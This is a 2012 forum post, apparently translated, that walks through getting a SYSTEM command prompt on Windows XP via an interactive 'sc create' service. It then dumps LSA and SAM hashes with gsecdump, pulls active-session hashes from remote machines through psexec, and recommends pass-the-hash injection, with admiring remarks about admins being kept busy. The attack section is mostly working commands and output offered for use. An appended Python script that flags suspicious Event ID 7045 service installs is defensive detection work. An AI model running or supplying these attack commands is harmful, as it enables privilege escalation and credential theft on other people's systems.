Hash injection attack

Original poster, posted 2012-11-6 21:09:29
To get a DOS Prompt as NT system:
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

A hint: you can use iam from the pshtools toolkit to import the HASH information just grabbed with gsecdump into the local lsass process and so carry out a hash injection attack. The foreigners really are good at this; admins are going to be busy now. The LM/NT hashes obtained during ARP spoofing, and those obtained with gethash, actually never need to be cracked at all; it is just a matter of using the tool. As the original article puts it well: whether the password is 4 characters or 127, once you have the hash it is 100% done.
Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
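The technique above starts by registering a service whose image is cmd.exe and then runs gsecdump through PsExec's own service (PSEXESVC). Both steps leave a Windows System log record, Event ID 7045 ("A service was installed in the system"), which is the obvious place for an administrator to look. The following is an added example of that check; it is not part of the original post, nor code from Truesec, Sysinternals or any tool named here. The pipe-separated flattening of the 7045 fields (EventID|ServiceName|ImagePath|ServiceType|StartType|AccountName) and the sample records are constructed for the example; a real pipeline would read the EVTX/XML fields of the same names.

```python
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample records modelled on Windows System log Event ID 7045.
# Each record is flattened to one pipe-separated line for this example:
# EventID|ServiceName|ImagePath|ServiceType|StartType|AccountName
SAMPLE_EVENTS = [
    "7045|shellcmdline|C:\\WINDOWS\\system32\\cmd.exe /K start|user mode service|demand start|LocalSystem",
    "7045|PSEXESVC|%SystemRoot%\\PSEXESVC.exe|user mode service|demand start|LocalSystem",
    "7045|Spooler|C:\\WINDOWS\\system32\\spoolsv.exe|user mode service|auto start|LocalSystem",
    "7036|Spooler|The Print Spooler service entered the running state.|||",
]

# Command interpreters / script hosts that have no business being a service image.
INTERPRETERS = ("cmd.exe", "powershell.exe", "cscript.exe", "wscript.exe", "rundll32.exe")
# Service names installed by remote-execution tools (PsExec installs PSEXESVC).
REMOTE_EXEC_SERVICES = ("psexesvc",)

FIELDS = ("event_id", "service_name", "image_path", "service_type", "start_type", "account")


@dataclass
class Finding:
    service_name: str
    image_path: str
    account: str
    reasons: List[str] = field(default_factory=list)


def parse_7045(line: str) -> Optional[dict]:
    """Return a dict of the 7045 fields, or None for other event IDs / malformed lines."""
    parts = line.rstrip("\n").split("|")
    if len(parts) != len(FIELDS) or parts[0] != "7045":
        return None
    return dict(zip(FIELDS, parts))


def image_binary(image_path: str) -> str:
    """Extract the executable name from an ImagePath, ignoring arguments and quoting."""
    path = image_path.strip()
    if path.startswith('"'):
        # Quoted path: everything up to the closing quote is the binary.
        end = path.find('"', 1)
        path = path[1:end] if end > 0 else path[1:]
    else:
        tokens = path.split()
        path = tokens[0] if tokens else path
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess(event: dict) -> Optional[Finding]:
    """Apply the heuristics to one parsed 7045 event; None means nothing suspicious."""
    reasons = []
    binary = image_binary(event["image_path"])
    if binary in INTERPRETERS:
        reasons.append(f"service image is a command interpreter ({binary})")
    if event["service_name"].lower() in REMOTE_EXEC_SERVICES:
        reasons.append("service name matches a remote-execution tool (PsExec)")
    # Only worth noting once something else already looks wrong: most services are LocalSystem.
    if reasons and event["account"].lower() == "localsystem":
        reasons.append("runs as LocalSystem")
    if not reasons:
        return None
    return Finding(event["service_name"], event["image_path"], event["account"], reasons)


def suspicious_service_installs(lines: List[str]) -> List[Finding]:
    """Scan flattened event lines and return findings for suspicious service installs."""
    findings = []
    for line in lines:
        event = parse_7045(line)
        if event is None:
            continue
        finding = assess(event)
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in suspicious_service_installs(SAMPLE_EVENTS):
        print(f"{f.service_name}: {f.image_path} -> {'; '.join(f.reasons)}")
```

Run against the sample records it reports shellcmdline (interpreter as service image) and PSEXESVC (PsExec's service) and ignores the legitimate Spooler install and the unrelated 7036 state-change event. The interpreter list and the remote-execution service names are the tunable parts; the 7045 record itself is what every variant of this technique leaves behind, regardless of which hash-dumping tool is run afterwards.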